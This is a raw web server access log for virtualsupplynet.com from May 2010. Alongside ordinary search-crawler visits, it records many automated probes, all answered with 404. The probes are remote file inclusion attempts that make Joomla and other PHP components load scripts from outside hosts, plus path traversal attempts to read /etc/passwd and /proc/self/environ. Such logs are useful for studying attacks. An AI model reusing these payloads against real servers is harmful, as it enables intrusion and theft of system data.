218.48.202.44 - - [11/May/2010:09:32:52 -0700] "GET /logs/access_091205.log//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.pesmanage.com/newsite/modules/mod_jacatslwi/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.109.102.158 - - [11/May/2010:11:55:33 -0700] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
210.109.102.158 - - [11/May/2010:11:55:34 -0700] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
213.149.105.8 - - [11/May/2010:12:33:23 -0700] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
213.149.105.8 - - [11/May/2010:12:33:23 -0700] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.109.102.158 - - [11/May/2010:12:34:33 -0700] "GET /logs/access_100130.log/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
210.109.102.158 - - [11/May/2010:12:34:34 -0700] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
210.109.102.158 - - [11/May/2010:12:34:35 -0700] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
88.250.57.232 - - [11/May/2010:13:11:25 -0700] "GET /logs/access_100510.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [11/May/2010:13:11:26 -0700] "GET /logs/access_100511.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
193.47.80.41 - - [11/May/2010:13:13:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [11/May/2010:13:13:08 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
74.222.1.75 - - [11/May/2010:13:24:10 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://www.virtualsupplynet.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
74.222.1.75 - - [11/May/2010:13:24:13 -0700] "GET / HTTP/1.0" 200 763 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
66.235.124.132 - - [11/May/2010:14:09:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
66.235.124.132 - - [11/May/2010:14:09:35 -0700] "GET /logs/access_081220.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
208.80.193.39 - - [11/May/2010:14:34:47 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.0; SBC; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
211.189.18.242 - - [11/May/2010:15:05:28 -0700] "GET /logs/access_091205.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [11/May/2010:15:05:28 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [11/May/2010:15:05:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [11/May/2010:15:06:57 -0700] "GET /logs/access_100130.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:22:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:22:58 -0700] "GET /logs/access_100130.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:22:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:28:10 -0700] "GET /logs/access_100130.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:28:10 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:28:10 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:29:25 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:29:25 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [11/May/2010:16:29:25 -0700] "GET /logs/access_100130.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.115.87 - - [11/May/2010:18:44:15 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [11/May/2010:18:44:16 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
173.236.37.202 - - [11/May/2010:21:45:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
173.236.37.202 - - [11/May/2010:21:45:53 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
173.236.37.202 - - [11/May/2010:21:45:53 -0700] "GET /logs/access_100130.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:00:46:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:01:16:09 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:01:16:09 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
208.80.193.43 - - [12/May/2010:02:11:37 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; Media Center PC 2.8)" "virtualsupplynet.com"
211.189.18.242 - - [12/May/2010:02:52:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
67.195.115.87 - - [12/May/2010:03:59:03 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [12/May/2010:03:59:03 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
66.249.65.59 - - [12/May/2010:04:15:42 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
66.249.65.39 - - [12/May/2010:04:15:42 -0700] "GET /logs/access_091010.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
66.249.65.45 - - [12/May/2010:04:29:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
92.240.42.10 - - [12/May/2010:05:05:54 -0700] "GET /index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [12/May/2010:05:05:54 -0700] "GET /logs/access_091205.log/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [12/May/2010:05:05:55 -0700] "GET /logs/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.240.42.10 - - [12/May/2010:05:06:28 -0700] "GET /logs/access_091205.log%20/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
110.45.145.92 - - [12/May/2010:05:07:19 -0700] "GET /logs/access_091205.log/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.45.145.92 - - [12/May/2010:05:07:19 -0700] "GET /index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.45.145.92 - - [12/May/2010:05:07:24 -0700] "GET /logs/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
110.45.145.92 - - [12/May/2010:05:07:32 -0700] "GET /logs/access_091205.log%20/index2.php?to=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:20:03 -0700] "GET /config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:20:03 -0700] "GET /config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
174.123.124.82 - - [12/May/2010:05:27:40 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
75.25.154.162 - - [12/May/2010:05:31:46 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:42:52 -0700] "GET /logs/access_091205.log/config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:42:54 -0700] "GET /config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:42:55 -0700] "GET /logs/config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:43:26 -0700] "GET /logs/access_091205.log/config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:43:27 -0700] "GET /config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
200.202.243.41 - - [12/May/2010:05:43:29 -0700] "GET /logs/config.inc.php?path_escape=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
89.108.64.200 - - [12/May/2010:05:46:43 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
174.123.124.82 - - [12/May/2010:05:57:51 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.123.124.82 - - [12/May/2010:05:57:51 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
174.123.124.82 - - [12/May/2010:05:57:51 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
75.25.154.162 - - [12/May/2010:06:13:44 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
75.25.154.162 - - [12/May/2010:06:13:46 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
75.25.154.162 - - [12/May/2010:06:13:46 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
217.172.150.13 - - [12/May/2010:06:22:00 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:24:05 -0700] "GET /logs/access_100130.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:24:05 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:24:05 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
65.60.41.26 - - [12/May/2010:06:25:13 -0700] "GET /!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
187.45.193.142 - - [12/May/2010:06:25:29 -0700] "GET /!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:26:20 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:26:20 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
121.190.102.21 - - [12/May/2010:06:26:21 -0700] "GET /logs/access_100130.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
65.60.41.26 - - [12/May/2010:06:40:42 -0700] "GET /logs/access_100130.log/!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
65.60.41.26 - - [12/May/2010:06:40:42 -0700] "GET /!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
65.60.41.26 - - [12/May/2010:06:40:42 -0700] "GET /logs/!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
187.45.193.142 - - [12/May/2010:06:45:49 -0700] "GET /logs/access_100130.log/!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
187.45.193.142 - - [12/May/2010:06:45:50 -0700] "GET /!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
187.45.193.142 - - [12/May/2010:06:45:50 -0700] "GET /logs/!scanhttp://www.blogaqualung.com/skins/grey/tmp.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
89.108.64.200 - - [12/May/2010:06:58:30 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
89.108.64.200 - - [12/May/2010:06:58:35 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
89.108.64.200 - - [12/May/2010:06:58:41 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.virtualsupplynet.com"
173.212.245.98 - - [12/May/2010:07:05:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
217.172.150.13 - - [12/May/2010:07:31:39 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
217.172.150.13 - - [12/May/2010:07:31:39 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
217.172.150.13 - - [12/May/2010:07:31:39 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.virtualsupplynet.com"
210.50.189.221 - - [12/May/2010:07:41:02 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
67.195.115.87 - - [12/May/2010:07:51:31 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
203.19.4.18 - - [12/May/2010:07:53:01 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
211.239.161.143 - - [12/May/2010:08:10:18 -0700] "GET /logs/access_100313.log/components/com_moodle/moodle.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.239.161.143 - - [12/May/2010:08:10:19 -0700] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.239.161.143 - - [12/May/2010:08:10:23 -0700] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
207.46.13.135 - - [12/May/2010:08:54:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.13.135 - - [12/May/2010:09:03:49 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:08:48 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:08:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:08:48 -0700] "GET /logs/access_100206.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:10:38 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:10:38 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
61.8.3.157 - - [12/May/2010:09:10:38 -0700] "GET /logs/access_100206.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.50.189.221 - - [12/May/2010:09:41:59 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [12/May/2010:09:41:59 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [12/May/2010:09:42:01 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
210.50.189.221 - - [12/May/2010:09:43:49 -0700] "GET /logs/access_100206.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.19.4.18 - - [12/May/2010:10:37:45 -0700] "GET /logs/access_091205.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.19.4.18 - - [12/May/2010:10:37:51 -0700] "GET /!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.19.4.18 - - [12/May/2010:10:37:55 -0700] "GET /logs/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.19.4.18 - - [12/May/2010:10:40:45 -0700] "GET /logs/access_100206.log/!scanhttp://www.themixproject.be/wwwberthendrixbe/httphp??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
209.126.254.3 - - [12/May/2010:12:34:50 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.virtualsupplynet.com"
209.126.254.3 - - [12/May/2010:12:34:51 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.virtualsupplynet.com"
88.250.57.232 - - [12/May/2010:13:03:38 -0700] "GET /logs/access_100511.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [12/May/2010:13:03:39 -0700] "GET /logs/access_100512.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
207.44.228.84 - - [12/May/2010:13:09:27 -0700] "GET /logs/access_100123.log//bemarket/postscript/postscript.php?p_mode=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.44.228.84 - - [12/May/2010:13:09:28 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.44.228.84 - - [12/May/2010:13:09:28 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
66.249.65.45 - - [12/May/2010:16:13:01 -0700] "GET /logs/access_091024.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
66.249.65.45 - - [12/May/2010:17:28:28 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
66.249.65.50 - - [12/May/2010:17:28:28 -0700] "GET /logs/access_091107.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
195.128.18.19 - - [12/May/2010:21:46:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)" "www.virtualsupplynet.com"
195.128.18.19 - - [12/May/2010:21:46:53 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; aiHitBot/1.0; +http://www.aihit.com/)" "www.virtualsupplynet.com"
